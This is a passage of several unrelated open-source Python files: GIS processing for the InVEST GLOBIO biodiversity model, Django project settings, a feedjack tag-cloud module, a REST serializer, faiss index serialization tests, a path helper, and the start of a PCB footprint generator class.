        driver = gdal.GetDriverByName('ESRI Shapefile')
        datasource_copy = driver.CreateCopy(
            summary_aoi_uri, original_datasource)
        layer = datasource_copy.GetLayer()
        msa_summary_field_def = ogr.FieldDefn('msa_mean', ogr.OFTReal)
        msa_summary_field_def.SetWidth(24)
        msa_summary_field_def.SetPrecision(11)
        layer.CreateField(msa_summary_field_def)
        # make an identifying id per polygon that can be used for aggregation
        layer_defn = layer.GetLayerDefn()
        while True:
            # last 8 characters because shapefile fields are limited to 8
            poly_id_field = str(uuid.uuid4())[-8:]
            if layer_defn.GetFieldIndex(poly_id_field) == -1:
                break
        layer_id_field = ogr.FieldDefn(poly_id_field, ogr.OFTInteger)
        layer.CreateField(layer_id_field)
        for poly_index, poly_feat in enumerate(layer):
            poly_feat.SetField(poly_id_field, poly_index)
            layer.SetFeature(poly_feat)
        layer.SyncToDisk()
        # aggregate by ID
        msa_summary = natcap.invest.pygeoprocessing_0_3_3.aggregate_raster_values_uri(
            msa_uri, summary_aoi_uri, shapefile_field=poly_id_field)
        # add new column to output file
        for feature_id in xrange(layer.GetFeatureCount()):
            feature = layer.GetFeature(feature_id)
            key_value = feature.GetFieldAsInteger(poly_id_field)
            feature.SetField(
                'msa_mean', float(msa_summary.pixel_mean[key_value]))
            layer.SetFeature(feature)
        # don't need a random poly id anymore
        layer.DeleteField(layer_defn.GetFieldIndex(poly_id_field))
    # Best-effort cleanup of temporary rasters; a failure is logged, not fatal.
    for root_dir, _, files in os.walk(tmp_dir):
        for filename in files:
            try:
                os.remove(os.path.join(root_dir, filename))
            except OSError:
                LOGGER.warn("couldn't remove temporary file %s", filename)
def make_gaussian_kernel_uri(sigma, kernel_uri):
    """Create a gaussian kernel raster.

    Writes a square GeoTIFF of side ``2 * 5 * sigma + 1`` whose values
    form a 2D gaussian centered on the raster and normalized to sum
    to 1, suitable as a convolution kernel.

    Parameters:
        sigma (float): standard deviation of the gaussian, in pixels.
        kernel_uri (string): path of the GeoTIFF to create.

    Returns:
        None
    """
    # 5 sigma captures essentially all of the gaussian's mass.
    max_distance = sigma * 5
    kernel_size = int(numpy.round(max_distance * 2 + 1))
    driver = gdal.GetDriverByName('GTiff')
    kernel_dataset = driver.Create(
        kernel_uri.encode('utf-8'), kernel_size, kernel_size, 1,
        gdal.GDT_Float32, options=['BIGTIFF=IF_SAFER'])
    # Make some kind of geotransform, it doesn't matter what but
    # will make GIS libraries behave better if it's all defined
    kernel_dataset.SetGeoTransform([444720, 30, 0, 3751320, 0, -30])
    srs = osr.SpatialReference()
    srs.SetUTM(11, 1)
    srs.SetWellKnownGeogCS('NAD27')
    kernel_dataset.SetProjection(srs.ExportToWkt())
    kernel_band = kernel_dataset.GetRasterBand(1)
    kernel_band.SetNoDataValue(-9999)
    col_index = numpy.array(xrange(kernel_size))
    integration = 0.0
    # First pass: write the unnormalized gaussian row by row while
    # accumulating the total mass in ``integration``.
    for row_index in xrange(kernel_size):
        kernel = numpy.exp(
            -((row_index - max_distance)**2 +
              (col_index - max_distance) ** 2)/(2.0*sigma**2)).reshape(
                  1, kernel_size)
        integration += numpy.sum(kernel)
        kernel_band.WriteArray(kernel, xoff=0, yoff=row_index)
    # Second pass: re-read each row and divide by the total so the
    # whole kernel sums to 1.
    for row_index in xrange(kernel_size):
        kernel_row = kernel_band.ReadAsArray(
            xoff=0, yoff=row_index, win_xsize=kernel_size, win_ysize=1)
        kernel_row /= integration
        kernel_band.WriteArray(kernel_row, 0, row_index)
def load_msa_parameter_table(
        msa_parameter_table_filename, intensification_fraction):
    """Load parameter table to a dict that defines the MSA ranges.

    Parameters:
        msa_parameter_table_filename (string): path to msa csv table with
            columns 'MSA_type', 'Value', and 'MSA_x'.
        intensification_fraction (float): a number between 0 and 1 indicating
            what level between msa_lu 8 and 9 to define the general GLOBIO
            code "12" to.

    Returns a dictionary of the form
        {
            'msa_f': {
                valuea: msa_f_value, ...
                valueb: ...
                '<': (bound, msa_f_value),
                '>': (bound, msa_f_value)}
            'msa_i_other_table': {
                valuea: msa_i_value, ...
                valueb: ...
                '<': (bound, msa_i_other_value),
                '>': (bound, msa_i_other_value)}
            'msa_i_primary': {
                valuea: msa_i_primary_value, ...
                valueb: ...
                '<': (bound, msa_i_primary_value),
                '>': (bound, msa_i_primary_value)}
            'msa_lu': {
                valuea: msa_lu_value, ...
                valueb: ...
                '<': (bound, msa_lu_value),
                '>': (bound, msa_lu_value)
                12: (msa_lu_8 * (1.0 - intensification_fraction) +
                     msa_lu_9 * intensification_fraction}
        }
    """
    # Text mode ('r') instead of binary ('rb'): Python 3's csv module
    # requires text-mode files (binary mode raises "iterator should
    # return strings, not bytes"), and text mode also works under
    # Python 2 for simple comma-separated files.
    with open(msa_parameter_table_filename, 'r') as msa_parameter_table_file:
        reader = csv.DictReader(msa_parameter_table_file)
        msa_dict = collections.defaultdict(dict)
        for line in reader:
            if line['Value'][0] in ['<', '>']:
                # open-ended ranges store a (bound, msa_value) tuple
                value = line['Value'][0]
                msa_dict[line['MSA_type']][value] = (
                    float(line['Value'][1:]), float(line['MSA_x']))
                continue
            elif '-' in line['Value']:
                # closed ranges like "0.5-0.9" are keyed by their upper bound
                value = float(line['Value'].split('-')[1])
            else:
                value = float(line['Value'])
            msa_dict[line['MSA_type']][value] = float(line['MSA_x'])
    # GLOBIO code 12 (general agriculture) interpolates between low-input
    # (msa_lu 8) and high-input (msa_lu 9) agriculture.
    msa_dict['msa_lu'][12] = (
        msa_dict['msa_lu'][8] * (1.0 - intensification_fraction) +
        msa_dict['msa_lu'][9] * intensification_fraction)
    # cast back to a regular dict so we get KeyErrors on non-existent keys
    return dict(msa_dict)
def _calculate_globio_lulc_map(
        lulc_to_globio_table_uri, lulc_uri, potential_vegetation_uri,
        pasture_uri, pasture_threshold, primary_threshold, file_suffix,
        intermediate_dir, tmp_dir, out_pixel_size):
    """Translate a general landcover map into a GLOBIO version.
    Parameters:
        lulc_to_globio_table_uri (string): a table that maps arbitrary
            landcover values to globio equivalents.
        lulc_uri (string): path to the raw landcover map.
        potential_vegetation_uri (string): a landcover map that indicates what
            the vegetation types would be if left to revert to natural state
        pasture_uri (string): a path to a raster that indicates the percent
            of pasture contained in the pixel. used to classify forest types
            from scrubland.
        pasture_threshold (float): the threshold to classify pixels in pasture
            as potential forest or scrub
        primary_threshold (float): the threshold to classify the calculated
            FFQI pixels into core forest or secondary
        file_suffix - (string) to append on output file
        intermediate_dir - (string) path to location for temporary files of
            which the following files are created
                'intermediate_globio_lulc.tif': reclassified landcover map to
                    globio landcover codes
                'ffqi.tif': index of fragmentation due to infrastructure and
                    original values of landscape
                'globio_lulc.tif': primary output of the function, starts
                    with intermeidate globio and modifies based on the other
                    biophysical parameters to the function as described in the
                    GLOBIO process
        tmp_dir - (string) path to location for temporary files
        out_pixel_size - (float) pixel size of output globio map
    Returns:
        a (string) filename to the generated globio GeoTIFF map
    """
    # Build a {lulc_code: globio_code} map from the user table, then
    # reclassify the raw landcover into intermediate GLOBIO codes.
    lulc_to_globio_table = natcap.invest.pygeoprocessing_0_3_3.get_lookup_from_table(
        lulc_to_globio_table_uri, 'lucode')
    lulc_to_globio = dict(
        [(lulc_code, int(table['globio_lucode'])) for
         (lulc_code, table) in lulc_to_globio_table.items()])
    intermediate_globio_lulc_uri = os.path.join(
        tmp_dir, 'intermediate_globio_lulc%s.tif' % file_suffix)
    globio_nodata = -1
    natcap.invest.pygeoprocessing_0_3_3.geoprocessing.reclassify_dataset_uri(
        lulc_uri, lulc_to_globio, intermediate_globio_lulc_uri,
        gdal.GDT_Int32, globio_nodata, exception_flag='values_required')
    globio_lulc_uri = os.path.join(
        intermediate_dir, 'globio_lulc%s.tif' % file_suffix)
    # smoothed natural areas are natural areas run through a gaussian filter
    forest_areas_uri = os.path.join(
        tmp_dir, 'forest_areas%s.tif' % file_suffix)
    forest_areas_nodata = -1
    def _forest_area_mask_op(lulc_array):
        """Masking out forest areas."""
        nodata_mask = lulc_array == globio_nodata
        # landcover code 130 represents all MODIS forest codes which originate
        # as 1-5
        result = (lulc_array == 130)
        return numpy.where(nodata_mask, forest_areas_nodata, result)
    LOGGER.info("create mask of natural areas")
    natcap.invest.pygeoprocessing_0_3_3.geoprocessing.vectorize_datasets(
        [intermediate_globio_lulc_uri], _forest_area_mask_op,
        forest_areas_uri, gdal.GDT_Int32, forest_areas_nodata,
        out_pixel_size, "intersection", dataset_to_align_index=0,
        vectorize_op=False)
    LOGGER.info('gaussian filter natural areas')
    gaussian_kernel_uri = os.path.join(
        tmp_dir, 'gaussian_kernel%s.tif' % file_suffix)
    make_gaussian_kernel_uri(SIGMA, gaussian_kernel_uri)
    smoothed_forest_areas_uri = os.path.join(
        tmp_dir, 'smoothed_forest_areas%s.tif' % file_suffix)
    natcap.invest.pygeoprocessing_0_3_3.geoprocessing.convolve_2d_uri(
        forest_areas_uri, gaussian_kernel_uri, smoothed_forest_areas_uri)
    ffqi_uri = os.path.join(
        intermediate_dir, 'ffqi%s.tif' % file_suffix)
    def _ffqi_op(forest_areas_array, smoothed_forest_areas):
        """Mask out ffqi only where there's an ffqi."""
        return numpy.where(
            forest_areas_array != forest_areas_nodata,
            forest_areas_array * smoothed_forest_areas,
            forest_areas_nodata)
    LOGGER.info('calculate ffqi')
    natcap.invest.pygeoprocessing_0_3_3.geoprocessing.vectorize_datasets(
        [forest_areas_uri, smoothed_forest_areas_uri], _ffqi_op,
        ffqi_uri, gdal.GDT_Float32, forest_areas_nodata,
        out_pixel_size, "intersection", dataset_to_align_index=0,
        vectorize_op=False)
    # remap globio lulc to an internal lulc based on ag and intensification
    # proportion these came from the 'expansion_scenarios.py'
    def _create_globio_lulc(
            lulc_array, potential_vegetation_array, pasture_array,
            ffqi):
        """Construct GLOBIO lulc given relevant biophysical parameters."""
        # Step 1.2b: Assign high/low according to threshold based on yieldgap.
        nodata_mask = lulc_array == globio_nodata
        # Step 1.2c: Classify all ag classes as a new LULC value "12" per our
        # custom design of agriculture
        # landcover 132 represents agriculture landcover types in the GLOBIO
        # classification scheme
        lulc_ag_split = numpy.where(
            lulc_array == 132, 12, lulc_array)
        nodata_mask = nodata_mask | (lulc_array == globio_nodata)
        # Step 1.3a: Split Scrublands and grasslands into pristine
        # vegetations, livestock grazing areas, and man-made pastures.
        # landcover 131 represents grassland/shrubland in the GLOBIO
        # classification
        three_types_of_scrubland = numpy.where(
            (potential_vegetation_array <= 8) & (lulc_ag_split == 131), 6.0,
            5.0)
        three_types_of_scrubland = numpy.where(
            (three_types_of_scrubland == 5.0) &
            (pasture_array < pasture_threshold), 1.0,
            three_types_of_scrubland)
        # Step 1.3b: Stamp ag_split classes onto input LULC
        # landcover 131 represents grassland/shrubland in the GLOBIO
        # classification
        broad_lulc_shrub_split = numpy.where(
            lulc_ag_split == 131, three_types_of_scrubland, lulc_ag_split)
        # Step 1.4a: Split Forests into Primary, Secondary
        four_types_of_forest = numpy.empty(lulc_array.shape)
        # 1 is primary forest
        four_types_of_forest[(ffqi >= primary_threshold)] = 1
        # 3 is secondary forest
        four_types_of_forest[(ffqi < primary_threshold)] = 3
        # Step 1.4b: Stamp ag_split classes onto input LULC
        # landcover code 130 represents all MODIS forest codes which originate
        # as 1-5
        globio_lulc = numpy.where(
            broad_lulc_shrub_split == 130, four_types_of_forest,
            broad_lulc_shrub_split)  # stamp primary vegetation
        return numpy.where(nodata_mask, globio_nodata, globio_lulc)
    LOGGER.info('create the globio lulc')
    natcap.invest.pygeoprocessing_0_3_3.geoprocessing.vectorize_datasets(
        [intermediate_globio_lulc_uri, potential_vegetation_uri, pasture_uri,
         ffqi_uri], _create_globio_lulc, globio_lulc_uri, gdal.GDT_Int32,
        globio_nodata, out_pixel_size, "intersection",
        dataset_to_align_index=0, vectorize_op=False)
    return globio_lulc_uri
def _collapse_infrastructure_layers(
        infrastructure_dir, base_raster_uri, infrastructure_uri):
    """Collapse all GIS infrastructure layers to one raster.

    Gathers all the GIS layers in the given directory and collapses them
    to a single byte raster mask where 1 indicates a pixel overlapping with
    one of the original infrastructure layers, 0 does not, and nodata
    indicates a region that has no layers that overlap but are still contained
    in the bounding box.

    Parameters:
        infrastructure_dir (string): path to a directory containing maps of
            either gdal compatible rasters or OGR compatible shapefiles.
        base_raster_uri (string): a path to a file that has the dimensions and
            projection of the desired output infrastructure file.
        infrastructure_uri (string): (output) path to a file that will be a
            byte raster with 1s everywhere there was a GIS layer present in
            the GIS layers in `infrastructure_dir`.

    Returns:
        None

    Raises:
        ValueError: if no GeoTIFFs or Shapefiles are found in
            ``infrastructure_dir``.
    """
    # load the infrastructure layers from disk; shapefiles are rasterized
    # onto a temporary raster aligned with the base raster
    infrastructure_filenames = []
    infrastructure_nodata_list = []
    infrastructure_tmp_filenames = []
    for root_directory, _, filename_list in os.walk(infrastructure_dir):
        for filename in filename_list:
            if filename.lower().endswith(".tif"):
                infrastructure_filenames.append(
                    os.path.join(root_directory, filename))
                infrastructure_nodata_list.append(
                    natcap.invest.pygeoprocessing_0_3_3.geoprocessing.get_nodata_from_uri(
                        infrastructure_filenames[-1]))
            if filename.lower().endswith(".shp"):
                infrastructure_tmp_raster = (
                    natcap.invest.pygeoprocessing_0_3_3.temporary_filename())
                natcap.invest.pygeoprocessing_0_3_3.geoprocessing.new_raster_from_base_uri(
                    base_raster_uri, infrastructure_tmp_raster,
                    'GTiff', -1.0, gdal.GDT_Int32, fill_value=0)
                natcap.invest.pygeoprocessing_0_3_3.geoprocessing.rasterize_layer_uri(
                    infrastructure_tmp_raster,
                    os.path.join(root_directory, filename), burn_values=[1],
                    option_list=["ALL_TOUCHED=TRUE"])
                infrastructure_filenames.append(infrastructure_tmp_raster)
                infrastructure_tmp_filenames.append(infrastructure_tmp_raster)
                infrastructure_nodata_list.append(
                    natcap.invest.pygeoprocessing_0_3_3.geoprocessing.get_nodata_from_uri(
                        infrastructure_filenames[-1]))
    if len(infrastructure_filenames) == 0:
        # Bug fix: the original passed the directory as a second argument to
        # ValueError (logger-style ``"%s", value``), so the path never
        # appeared in the message; interpolate it explicitly.
        raise ValueError(
            "infrastructure directory didn't have any GeoTIFFS or "
            "Shapefiles at %s" % infrastructure_dir)
    infrastructure_nodata = -1
    def _collapse_infrastructure_op(*infrastructure_array_list):
        """For each pixel, create mask 1 if all valid, else set to nodata."""
        nodata_mask = (
            infrastructure_array_list[0] == infrastructure_nodata_list[0])
        infrastructure_result = infrastructure_array_list[0] > 0
        for index in range(1, len(infrastructure_array_list)):
            current_nodata = (
                infrastructure_array_list[index] ==
                infrastructure_nodata_list[index])
            infrastructure_result = (
                infrastructure_result |
                ((infrastructure_array_list[index] > 0) & ~current_nodata))
            # a pixel is nodata only when every layer is nodata there
            nodata_mask = (
                nodata_mask & current_nodata)
        return numpy.where(
            nodata_mask, infrastructure_nodata, infrastructure_result)
    LOGGER.info('collapse infrastructure into one raster')
    out_pixel_size = natcap.invest.pygeoprocessing_0_3_3.geoprocessing.get_cell_size_from_uri(
        base_raster_uri)
    natcap.invest.pygeoprocessing_0_3_3.geoprocessing.vectorize_datasets(
        infrastructure_filenames, _collapse_infrastructure_op,
        infrastructure_uri, gdal.GDT_Byte, infrastructure_nodata,
        out_pixel_size, "intersection", dataset_to_align_index=0,
        vectorize_op=False)
    # clean up the temporary filenames
    for filename in infrastructure_tmp_filenames:
        os.remove(filename)
@validation.invest_validator
def validate(args, limit_to=None):
    """Validate args to ensure they conform to `execute`'s contract.
    Parameters:
        args (dict): dictionary of key(str)/value pairs where keys and
            values are specified in `execute` docstring.
        limit_to (str): (optional) if not None indicates that validation
            should only occur on the args[limit_to] value. The intent that
            individual key validation could be significantly less expensive
            than validating the entire `args` dictionary.
    Returns:
        list of ([invalid key_a, invalid_keyb, ...], 'warning/error message')
            tuples. Where an entry indicates that the invalid keys caused
            the error message in the second part of the tuple. This should
            be an empty list if validation succeeds.
    """
    missing_key_list = []
    no_value_list = []
    validation_error_list = []
    # Keys always required regardless of mode.
    required_keys = [
        'workspace_dir',
        'aoi_uri',
        'infrastructure_dir',
        'intensification_fraction',
        'msa_parameters_uri']
    # The remaining requirements depend on the mode: mode (b) takes a
    # predefined GLOBIO raster, mode (a) derives one from several inputs.
    if 'predefined_globio' in args:
        if args['predefined_globio']:
            required_keys.append('globio_lulc_uri')
        else:
            required_keys.extend([
                'lulc_to_globio_table_uri',
                'lulc_uri',
                'pasture_uri',
                'potential_vegetation_uri',
                'primary_threshold',
                'pasture_threshold'])
    for key in required_keys:
        if limit_to is None or limit_to == key:
            if key not in args:
                missing_key_list.append(key)
            elif args[key] in ['', None]:
                no_value_list.append(key)
    if len(missing_key_list) > 0:
        # if there are missing keys, we have raise KeyError to stop hard
        raise KeyError(
            "The following keys were expected in `args` but were missing " +
            ', '.join(missing_key_list))
    if len(no_value_list) > 0:
        validation_error_list.append(
            (no_value_list, 'parameter has no value'))
    # Expected GIS type for each file-like argument; entries not in
    # required_keys for the current mode are skipped below.
    file_type_list = [
        ('aoi_uri', 'vector'),
        ('infrastructure_dir', 'directory'),
        ('msa_parameters_uri', 'table'),
        ('globio_lulc_uri', 'raster'),
        ('lulc_to_globio_table_uri', 'table'),
        ('lulc_uri', 'raster'),
        ('pasture_uri', 'raster'),
        ('potential_vegetation_uri', 'raster')]
    # check that existing/optional files are the correct types
    with utils.capture_gdal_logging():
        for key, key_type in file_type_list:
            if (limit_to in [None, key]) and key in required_keys:
                if not os.path.exists(args[key]):
                    validation_error_list.append(
                        ([key], 'not found on disk'))
                    continue
                if key_type == 'raster':
                    raster = gdal.OpenEx(args[key])
                    if raster is None:
                        validation_error_list.append(
                            ([key], 'not a raster'))
                    del raster
                elif key_type == 'vector':
                    vector = gdal.OpenEx(args[key])
                    if vector is None:
                        validation_error_list.append(
                            ([key], 'not a vector'))
                    del vector
    return validation_error_list
| StarcoderdataPython |
import os
# Django settings module: values here are plain module-level constants.
# Project root is two directories above this settings module.
PROJECT_ROOT = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir, os.pardir))
# NOTE(review): a SECRET_KEY committed to source control should be
# overridden via environment/local settings in real deployments.
SECRET_KEY = "pm=6+$d7--sl1rpmu7x*(72(=le!4lp-v-8tv993(+$7ak((&x"
MANAGERS = ADMINS = []
SITE_ID = 1
USE_I18N = True
USE_L10N = True
TIME_ZONE = "America/Chicago"
LANGUAGE_CODE = "en-us"
# These are for user-uploaded content.
MEDIA_ROOT = os.path.join(PROJECT_ROOT, "site_media")
MEDIA_URL = "/media/"
# These are for site static media (e.g. CSS and JS)
# This one is where static content is collected to.
STATIC_ROOT = os.path.join(PROJECT_ROOT, "static_root")
STATIC_URL = "/static/"
ADMIN_MEDIA_PREFIX = "/static/admin/"
STATICFILES_DIRS = [
    os.path.join(PROJECT_ROOT, "static"),
]
STATICFILES_FINDERS = [
    "django.contrib.staticfiles.finders.FileSystemFinder",
    "django.contrib.staticfiles.finders.AppDirectoriesFinder",
]
# Template stuff
TEMPLATE_LOADERS = [
    "django.template.loaders.filesystem.Loader",
    "django.template.loaders.app_directories.Loader",
]
TEMPLATE_CONTEXT_PROCESSORS = [
    "django.contrib.auth.context_processors.auth",
    "django.core.context_processors.debug",
    "django.core.context_processors.i18n",
    "django.core.context_processors.media",
    "django.core.context_processors.static",
    "django.core.context_processors.tz",
    "django.contrib.messages.context_processors.messages",
]
TEMPLATE_DIRS = [
    os.path.join(PROJECT_ROOT, "templates"),
]
ROOT_URLCONF = "tracebin_server.urls"
# Email tracebacks of server errors to ADMINS (standard Django logging).
LOGGING = {
    "version": 1,
    "disable_existing_loggers": False,
    "handlers": {
        "mail_admins": {
            "level": "ERROR",
            "class": "django.utils.log.AdminEmailHandler",
        },
    },
    "loggers": {
        "django.request": {
            "handlers": ["mail_admins"],
            "level": "ERROR",
            "propagate": True,
        },
    },
}
INSTALLED_APPS = [
    "django.contrib.sessions",
    "django.contrib.staticfiles",
    "django.contrib.messages",
    "django.contrib.auth",
    "django.contrib.contenttypes",
    "tracebin_server.traces",
]
| StarcoderdataPython |
168403 | # -*- coding: utf-8 -*-
"""
feedjack
<NAME>
fjcloud.py
"""
import math
from feedjack import fjlib
from feedjack import fjcache
def getsteps(levels, tagmax):
    """Return (level, upper_bound) pairs giving the maximum tag count
    handled by each tag-cloud level.
    """
    # Always produce at least two levels.
    num_levels = levels if levels >= 2 else 2
    increment = int(math.ceil(tagmax * 1.0 / num_levels - 1))
    steps = []
    for level in range(num_levels):
        steps.append((level, 1 + level * increment))
    # Force the top level's bound past the most popular tag's count.
    top_level = steps[-1][0]
    steps[-1] = (top_level, tagmax + 1)
    return steps
def build(site, tagdata):
    """Build the tag-cloud entries for a list of (name, count) tuples.

    Note: ``tagdata`` is sorted in place (by name, since the name is the
    first tuple element).
    """
    tagdata.sort()
    # The most popular tag's count sets the scale for the weight levels.
    tagmax = 0
    for _, count in tagdata:
        if count > tagmax:
            tagmax = count
    steps = getsteps(site.tagcloud_levels, tagmax)
    tags = []
    for name, count in tagdata:
        # Weight is 1 + the first level whose (positive) bound reaches
        # this tag's count.
        weight = [lvl for (lvl, bound) in steps
                  if bound >= count and bound > 0][0] + 1
        tags.append({'tagname': name, 'count': count, 'weight': weight})
    return tags
def cloudata(site):
    """Build every tag cloud for a site, keyed by feed id.

    Key 0 holds the aggregated, site-wide cloud; every other key is a
    subscribed feed's id.
    """
    rows = fjlib.getquery("""
        SELECT feedjack_post.feed_id, feedjack_tag.name, COUNT(*)
        FROM feedjack_post, feedjack_subscriber, feedjack_tag,
          feedjack_post_tags
        WHERE feedjack_post.feed_id=feedjack_subscriber.feed_id AND
          feedjack_post_tags.tag_id=feedjack_tag.id AND
          feedjack_post_tags.post_id=feedjack_post.id AND
          feedjack_subscriber.site_id=%d
        GROUP BY feedjack_post.feed_id, feedjack_tag.name
        ORDER BY feedjack_post.feed_id, feedjack_tag.name""" % site.id)
    perfeed = {}
    sitewide = {}
    for feed_id, tagname, tagcount in rows:
        perfeed.setdefault(feed_id, []).append((tagname, tagcount))
        sitewide[tagname] = sitewide.get(tagname, 0) + tagcount
    # Slot the global cloud in under the reserved key 0.
    perfeed[0] = sitewide.items()
    return dict((feed, build(site, tags)) for feed, tags in perfeed.items())
def getcloud(site, feed_id=None):
    """Return the (cached) tag cloud of a site, or of one of its feeds."""
    cloudict = fjcache.cache_get(site.id, 'tagclouds')
    if not cloudict:
        # Cache miss: rebuild all clouds for the site and store them.
        cloudict = cloudata(site)
        fjcache.cache_set(site, 'tagclouds', cloudict)
    if feed_id:
        # A subscriber's tag cloud has been requested; unknown feeds
        # yield an empty cloud.
        return cloudict.get(int(feed_id), [])
    # The site-wide tag cloud has been requested.
    return cloudict[0]
#~
| StarcoderdataPython |
1733055 | from rest_framework import serializers
from core.models.insurer import Insurer
class InsurerSerializer(serializers.ModelSerializer):
    """DRF serializer exposing an Insurer's id, name and active flag."""
    class Meta:
        model = Insurer
        fields = ('id', 'name', 'is_active')
| StarcoderdataPython |
1634938 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#!/usr/bin/env python3
import numpy as np
import unittest
import faiss
import tempfile
import os
import io
import sys
import warnings
from multiprocessing.dummy import Pool as ThreadPool
from common import get_dataset, get_dataset_2
class TestIOVariants(unittest.TestCase):
    """Index (de)serialization behaviour on damaged on-disk files."""

    def test_io_error(self):
        """read_index on a truncated file must raise a RuntimeError that
        mentions the offending filename."""
        d, n = 32, 1000
        x = np.random.uniform(size=(n, d)).astype('float32')
        index = faiss.IndexFlatL2(d)
        index.add(x)
        fd, fname = tempfile.mkstemp()
        os.close(fd)  # mkstemp returns an open fd; close it to avoid a leak
        try:
            faiss.write_index(index, fname)

            # sanity check: the intact file should load fine
            faiss.read_index(fname)

            # now damage the file by truncating it to half its size
            with open(fname, 'rb') as f:
                data = f.read()
            data = data[:int(len(data) / 2)]
            with open(fname, 'wb') as f:
                f.write(data)

            # should make a nice readable exception that mentions the filename
            try:
                faiss.read_index(fname)
            except RuntimeError as e:
                if fname not in str(e):
                    raise
            else:
                self.fail("read_index succeeded on a truncated file")
        finally:
            if os.path.exists(fname):
                os.unlink(fname)
class TestCallbacks(unittest.TestCase):
    """Round-trip indexes through Python callback IO and buffered wrappers.

    Fixes over the original: every mkstemp file descriptor is closed (they
    were leaked), and files are opened via context managers so handles are
    released even when an assertion fails.
    """

    def do_write_callback(self, bsz):
        """Serialize via PyCallbackIOWriter (buffered when bsz > 0), then
        deserialize from the in-memory bytes and compare vectors."""
        d, n = 32, 1000
        x = np.random.uniform(size=(n, d)).astype('float32')
        index = faiss.IndexFlatL2(d)
        index.add(x)

        f = io.BytesIO()
        # test with small block size
        writer = faiss.PyCallbackIOWriter(f.write, 1234)

        if bsz > 0:
            writer = faiss.BufferedIOWriter(writer, bsz)

        faiss.write_index(index, writer)
        del writer    # make sure all writes committed

        if sys.version_info[0] < 3:
            buf = f.getvalue()
        else:
            buf = f.getbuffer()
        index2 = faiss.deserialize_index(np.frombuffer(buf, dtype='uint8'))

        self.assertEqual(index.d, index2.d)
        self.assertTrue(np.all(
            faiss.vector_to_array(index.xb) == faiss.vector_to_array(index2.xb)
        ))

        # This is not a callable function: should raise an exception
        writer = faiss.PyCallbackIOWriter("blabla")
        self.assertRaises(
            Exception,
            faiss.write_index, index, writer
        )

    def test_buf_read(self):
        """BufferedIOReader should transparently chunk reads from a file."""
        x = np.random.uniform(size=20)

        fd, fname = tempfile.mkstemp()
        os.close(fd)  # close the fd returned by mkstemp (was leaked before)
        try:
            x.tofile(fname)

            with open(fname, 'rb') as f:
                reader = faiss.PyCallbackIOReader(f.read, 1234)

                bsz = 123
                reader = faiss.BufferedIOReader(reader, bsz)

                y = np.zeros_like(x)
                print('nbytes=', y.nbytes)
                reader(faiss.swig_ptr(y), y.nbytes, 1)

            np.testing.assert_array_equal(x, y)
        finally:
            if os.path.exists(fname):
                os.unlink(fname)

    def do_read_callback(self, bsz):
        """Write an index to disk, read it back through a PyCallbackIOReader
        (buffered when bsz > 0) and compare vectors."""
        d, n = 32, 1000
        x = np.random.uniform(size=(n, d)).astype('float32')
        index = faiss.IndexFlatL2(d)
        index.add(x)

        fd, fname = tempfile.mkstemp()
        os.close(fd)
        try:
            faiss.write_index(index, fname)

            with open(fname, 'rb') as f:
                reader = faiss.PyCallbackIOReader(f.read, 1234)

                if bsz > 0:
                    reader = faiss.BufferedIOReader(reader, bsz)

                index2 = faiss.read_index(reader)

            self.assertEqual(index.d, index2.d)
            np.testing.assert_array_equal(
                faiss.vector_to_array(index.xb),
                faiss.vector_to_array(index2.xb)
            )

            # This is not a callable function: should raise an exception
            reader = faiss.PyCallbackIOReader("blabla")
            self.assertRaises(
                Exception,
                faiss.read_index, reader
            )
        finally:
            if os.path.exists(fname):
                os.unlink(fname)

    def test_write_callback(self):
        self.do_write_callback(0)

    def test_write_buffer(self):
        self.do_write_callback(123)
        self.do_write_callback(2345)

    def test_read_callback(self):
        self.do_read_callback(0)

    def test_read_callback_buffered(self):
        self.do_read_callback(123)
        self.do_read_callback(12345)

    def test_read_buffer(self):
        """read_index through a BufferedIOReader over a FileIOReader."""
        d, n = 32, 1000
        x = np.random.uniform(size=(n, d)).astype('float32')
        index = faiss.IndexFlatL2(d)
        index.add(x)

        fd, fname = tempfile.mkstemp()
        os.close(fd)
        try:
            faiss.write_index(index, fname)

            reader = faiss.BufferedIOReader(
                faiss.FileIOReader(fname), 1234)

            index2 = faiss.read_index(reader)

            self.assertEqual(index.d, index2.d)
            np.testing.assert_array_equal(
                faiss.vector_to_array(index.xb),
                faiss.vector_to_array(index2.xb)
            )
        finally:
            if os.path.exists(fname):
                os.unlink(fname)

    def test_transfer_pipe(self):
        """ transfer an index through a Unix pipe """
        d, n = 32, 1000
        x = np.random.uniform(size=(n, d)).astype('float32')
        index = faiss.IndexFlatL2(d)
        index.add(x)
        Dref, Iref = index.search(x, 10)

        rf, wf = os.pipe()

        # start thread that will decompress the index
        def index_from_pipe():
            reader = faiss.PyCallbackIOReader(lambda size: os.read(rf, size))
            return faiss.read_index(reader)

        fut = ThreadPool(1).apply_async(index_from_pipe, ())

        # write to pipe
        writer = faiss.PyCallbackIOWriter(lambda b: os.write(wf, b))
        faiss.write_index(index, writer)

        index2 = fut.get()

        # closing is not really useful but it does not hurt
        os.close(wf)
        os.close(rf)

        Dnew, Inew = index2.search(x, 10)

        np.testing.assert_array_equal(Iref, Inew)
        np.testing.assert_array_equal(Dref, Dnew)
| StarcoderdataPython |
1636980 | import os
import sys
# Absolute path to the strictdoc checkout, resolved relative to this file.
STRICTDOC_ROOT_PATH = os.path.abspath(
    os.path.join(__file__, "../../../../strictdoc")
)
# Explicit check instead of `assert`: asserts are stripped when Python runs
# with -O, which would silently skip this sanity check.
if not os.path.exists(STRICTDOC_ROOT_PATH):
    raise RuntimeError("does not exist: {}".format(STRICTDOC_ROOT_PATH))
# Make the strictdoc package importable for scripts using this helper.
sys.path.append(STRICTDOC_ROOT_PATH)
| StarcoderdataPython |
159493 | <reponame>NiceCircuits/pcbLibraryManager<filename>src/pcbLibraryManager/footprints/footprintSmdQuad.py
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 3 06:52:50 2015
@author: piotr at nicecircuits.com
"""
from libraryManager.footprint import footprint
from libraryManager.footprintPrimitive import *
from libraryManager.defaults import defaults
from libraryManager.common import *
class footprintSmdQuad(footprint):
    """
    Footprint generator for quad SMD packages.
    Builds pinCount/4 pads per side (with optional 3D leads), the package
    body, pin-1 markers (3D cylinder + silk circle), courtyard/silk and
    the name/value text objects.
    """
    def __init__(self, name, alternativeLibName, pinCount, pitch, padSpan, padDimensions,
